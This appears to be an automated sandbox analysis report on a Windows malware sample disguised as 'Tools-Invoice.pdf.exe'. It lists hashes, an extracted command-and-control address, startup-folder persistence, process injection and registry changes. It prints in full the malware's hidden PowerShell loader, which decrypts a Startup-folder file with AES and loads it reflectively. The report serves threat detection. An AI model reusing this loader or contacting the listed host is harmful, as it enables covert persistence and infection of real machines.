Analysis
-
max time kernel
152s -
max time network
158s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17/04/2024, 00:04
Static task
static1
Behavioral task
behavioral1
Sample
Tools-Invoice.pdf.exe
Resource
win7-20240221-en
General
-
Target
Tools-Invoice.pdf.exe
-
Size
272.0MB
-
MD5
19ec298f977fdc71f195a4782fa8b156
-
SHA1
4a6035ce7510a7cc02bb785244e2cfcaec89131d
-
SHA256
32b42c8c10ce7ec03005931d079fe7bb7f0e5b36bcf57a789081c6f7787e630c
-
SHA512
d8cd8e043c24998d41b06ed0de8a8628389dab04be583094e68f5660ccc666dc260367297d373c800869fe36878aa8730fe35c2eb0b1e6631c0c2fec338b2391
-
SSDEEP
49152:Uj+t6IRUEFX1PVv3Gfbs8HuQq1nvHol6Kz3DfjkJO:Uj+tNtV/AAFBH9yzLt
Malware Config
Extracted
jupyter
http://146.70.71.174
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IGkyfEbUaMfoDlfVRjFNGDzVu.ppYERxDIBNXzrxpfvEsgVIFHvZOUVc Tools-Invoice.pdf.exe -
Executes dropped EXE 1 IoCs
pid Process 1716 TvtuziedoTs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell\open Tools-Invoice.pdf.exe Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('4tlPZeU/u3NIcXTiv65iMu84tVLO8U2c+xIHrjnZmxo=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxJR2t5ZkViVWFNZm9EbGZWUmpGTkdEelZ1LnBwWUVSeERJQk5YenJ4cGZ2RXNnVklGSHZaT1VWYw=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[rt8wjQPEtmlcqs2iZrKuC47aQbTVEoFCYALe76hrb9pjqI8TnDQI_jjI0fyLqYCg.F5YiBpBH3_z]::QcCj8u48mNjtGnV7OG0X1ZnL892XAoU7zbmgVpCcAaUUbOZCUGvAYET2YXVRYaeFftCcN();\"" Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.ppyerxdibnxzrxpfvesgvifhvzouvc Tools-Invoice.pdf.exe Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.ppyerxdibnxzrxpfvesgvifhvzouvc\ = "azuihrtvmuiivbsmfcs" Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell\open\command Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs Tools-Invoice.pdf.exe Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell Tools-Invoice.pdf.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2624 Tools-Invoice.pdf.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe 1716 TvtuziedoTs.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2000 wrote to memory of 1716 2000 Tools-Invoice.pdf.exe 28 PID 2000 wrote to memory of 1716 2000 Tools-Invoice.pdf.exe 28 PID 2000 wrote to memory of 1716 2000 Tools-Invoice.pdf.exe 28 PID 2000 wrote to memory of 1716 2000 Tools-Invoice.pdf.exe 28 PID 2000 wrote to memory of 2624 2000 Tools-Invoice.pdf.exe 29 PID 2000 wrote to memory of 2624 2000 Tools-Invoice.pdf.exe 29 PID 2000 wrote to memory of 2624 2000 Tools-Invoice.pdf.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe"C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\TvtuziedoTs.exe"C:\Users\Admin\AppData\Local\Temp\TvtuziedoTs.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1716
-
-
C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe"C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe" /s2⤵
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
997KB
MD5dbc534854dd385e59a3f1906ddfb9020
SHA12b3062d82232ce10a8713829199769ff0d12e0fc
SHA25606486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA5121506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951